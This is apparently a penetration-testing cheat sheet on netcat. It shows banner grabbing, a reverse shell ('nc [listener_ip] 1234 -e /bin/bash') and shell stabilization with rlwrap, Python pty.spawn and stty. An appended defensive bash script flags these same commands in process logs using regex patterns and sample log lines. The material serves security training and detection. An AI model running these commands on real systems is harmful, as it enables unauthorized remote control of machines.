# Netcat - Advanced

## Usage and Examples

### Using netcat for banner grabbing

```bash
nc 192.168.1.1 80
```

### Reverse shell with netcat

On listener's machine:

```bash
nc -lvnp 1234
```

(The `-lvnp` options tell netcat to listen (`-l`) verbosely (`-v`) on the given port (`-p`) with no name resolution (`-n`).)

On target machine:

```bash
nc [listener_ip] 1234 -e /bin/bash
```

(Specifying `-e /bin/bash` is optional.)

## Stabilizing Netcat

By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell turns it into a more robust, interactive session, which improves its reliability and the control over the compromised system.

## Methods for Netcat Shell Stabilization

### Using `rlwrap`

Steps:

#### 1. Install `rlwrap` on your local machine if not installed

```bash
sudo apt-get install rlwrap
```

#### 2. Use the netcat command with `rlwrap`

```bash
rlwrap nc -lvnp 4444
```

#### 3. Background the shell with `Ctrl + Z`

#### 4. Re-enter the shell

```bash
stty raw -echo; fg
```

### Upgrading to fully interactive TTY

Use Python:

1.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

2.

```bash
export TERM=xterm
```

3.

```bash
stty raw -echo; fg
```

### Setting terminal variables

Steps:

#### Background the netcat shell

Press `Ctrl + Z`.

#### Set terminal type

```bash
stty raw -echo; fg
```

#### Export terminal variables

```bash
reset
```

```bash
export SHELL=bash
```

```bash
export TERM=xterm
```

```bash
stty rows [number] columns [number]
```

(Replace `[number]` with the appropriate values for your terminal size)

## Overview of Netcat Shell stabilization

Step 1:

Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

We still won’t be able to use tab autocomplete or the arrow keys.

Step 2:

Get access to term commands such as `clear`.

```bash
export TERM=xterm
```

Step 3:

Now, background the shell.

```
Ctrl + Z
```

Step 4:

Use the following back in the normal terminal:

```bash
stty raw -echo; fg
```

This does two things: first, `stty raw -echo` turns off our own terminal echo, which gives us access to tab autocomplete, the arrow keys, and Ctrl + C to kill processes. Second, `fg` brings the backgrounded shell back to the foreground.

Step 5:

Finally, correct the distorted rows and columns of the terminal where we type commands.

```bash
stty rows 38 columns 116
```
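
Of the commands above, the ones that run on the target (`nc ... -e`, the Python `pty.spawn` one-liner, `stty rows ... columns ...`) appear in process-execution logs. The following is an added example, not part of the original page, that labels such command lines; the log format (one command line per row), the function names and the sample lines are assumptions constructed for illustration.

```bash
# Added example: label process command lines that match the target-side
# commands from this page. Input format is an assumption: one command line
# per row, as exported from auditd EXECVE records or an EDR process log.
# Not visible in such logs: `export TERM=xterm` (shell builtin) and
# `stty raw -echo; fg` (typed in the listener's own terminal).

classify_cmdline() {
  cmd=$1
  if printf '%s\n' "$cmd" |
      grep -Eq '(^|[ /])(nc|ncat|netcat) .*-e +([^ ]*/)?(ba|da|z)?sh( |$)'; then
    echo NC_EXEC_SHELL     # netcat handing a shell to a socket
  elif printf '%s\n' "$cmd" |
      grep -Eq 'python[0-9.]* +-c .*pty\.spawn'; then
    echo PTY_SPAWN         # one-liner that allocates a PTY for a shell
  elif printf '%s\n' "$cmd" |
      grep -Eq '(^|[ /])stty +rows +[0-9]+ +col(umn)?s +[0-9]+'; then
    echo STTY_RESIZE       # weak alone; useful when it follows PTY_SPAWN
  else
    echo NONE
  fi
}

# Read command lines on stdin, print "LABEL<TAB>command line" for each hit.
scan_log() {
  while IFS= read -r line; do
    label=$(classify_cmdline "$line")
    [ "$label" = NONE ] || printf '%s\t%s\n' "$label" "$line"
  done
}

# Constructed sample data (192.0.2.0/24 is a documentation range).
sample_log() {
  cat <<'EOF'
/usr/bin/nc -z -w 2 192.0.2.9 443
nc 192.0.2.10 1234 -e /bin/bash
python3 -c import pty; pty.spawn("/bin/bash")
/usr/bin/python3 -c print("health ok")
stty -a
stty rows 38 columns 116
EOF
}

sample_log | scan_log
```

On the sample input the scan reports three hits and leaves the port check, the health-check one-liner and `stty -a` unlabelled.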

